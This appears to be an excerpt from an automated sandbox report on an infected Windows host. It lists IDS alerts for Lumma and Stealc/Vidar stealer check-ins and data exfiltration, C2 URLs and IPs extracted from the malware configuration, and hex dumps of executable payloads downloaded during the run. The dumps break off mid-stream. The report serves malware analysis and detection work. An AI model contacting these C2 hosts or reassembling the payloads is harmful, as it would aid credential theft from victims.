Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49765 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49765 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.202.5.153:443 -> 192.168.2.8:49840
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49921 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49974 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49974 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49949 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49949 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49927 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49927 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49906 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49961 -> 116.202.5.153:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49961 -> 116.202.5.153:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.115/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://rampnatleadk.click/api
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: home.fivegg5th.top
Source: Malware configuration extractor	URLs: .fivgg5th.top
Source: Malware configuration extractor	URLs: bhome.fivegg5th.top
Source: Malware configuration extractor	URLs: .1.1home.fivegg5th.top

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818

Source: unknown

Network traffic detected: DNS query count 47

Source: global traffic

TCP traffic: 192.168.2.8:49818 -> 103.84.89.222:33791

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:02 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Sat, 01 Feb 2025 16:13:50 GMTConnection: keep-aliveETag: "679e483e-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 e0 6f 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 78 6b 79 68 78 75 77 00 30 1a 00 00 b0 4f 00 00 26 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 64 65 79 74 74 6f 6e 00 10 00 00 00 e0 69 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:06 GMTContent-Type: application/octet-streamContent-Length: 3024384Last-Modified: Sat, 01 Feb 2025 16:14:01 GMTConnection: keep-aliveETag: "679e4849-2e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 2c 29 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b5 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 69 68 70 78 6a 79 75 00 10 2b 00 00 b0 06 00 00 0a 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 75 69 7a 65 61 74 00 10 00 00 00 c0 31 00 00 06 00 00 00 fe 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 04 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:18:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:12 GMTContent-Type: application/octet-streamContent-Length: 1958912Last-Modified: Sat, 01 Feb 2025 15:29:56 GMTConnection: keep-aliveETag: "679e3df4-1de400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 3e 01 00 00 00 00 00 00 90 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 86 00 00 04 00 00 1e 9f 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 9c ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 0f 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c ad 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 63 63 66 6b 64 68 67 00 f0 1a 00 00 90 6b 00 00 ec 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 77 76 69 74 69 69 6e 00 10 00 00 00 80 86 00 00 04 00 00 00 be 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 86 00 00 22 00 00 00 c2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:17 GMTContent-Type: application/octet-streamContent-Length: 6483456Last-Modified: Sat, 01 Feb 2025 14:52:32 GMTConnection: keep-aliveETag: "679e3530-62ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 52 54 9b 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d0 47 00 00 c6 69 00 00 32 00 00 00 60 a1 00 00 10 00 00 00 e0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 a1 00 00 04 00 00 a6 75 63 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 67 00 73 00 00 00 00 00 67 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 c8 69 00 88 06 00 00 bc 45 a1 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 45 a1 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 66 00 00 10 00 00 00 8c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 67 00 00 02 00 00 00 9c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 67 00 00 02 00 00 00 9e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 74 61 64 7a 73 6e 6d 00 30 3a 00 00 20 67 00 00 28 3a 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 73 6d 6a 72 62 6b 69 00 10 00 00 00 50 a1 00 00 04 00 00 00 c8 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 a1 00 00 22 00 00 00 cc 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:27 GMTContent-Type: application/octet-streamContent-Length: 1867264Last-Modified: Sat, 01 Feb 2025 15:38:01 GMTConnection: keep-aliveETag: "679e3fd9-1c7e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 d0 0d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 71 6a 65 73 6e 6d 73 00 c0 19 00 00 00 30 00 00 b2 19 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 74 63 69 62 6f 66 70 00 10 00 00 00 c0 49 00 00 04 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 5c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:31 GMTContent-Type: application/octet-streamContent-Length: 1924608Last-Modified: Sat, 01 Feb 2025 16:13:40 GMTConnection: keep-aliveETag: "679e4834-1d5e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 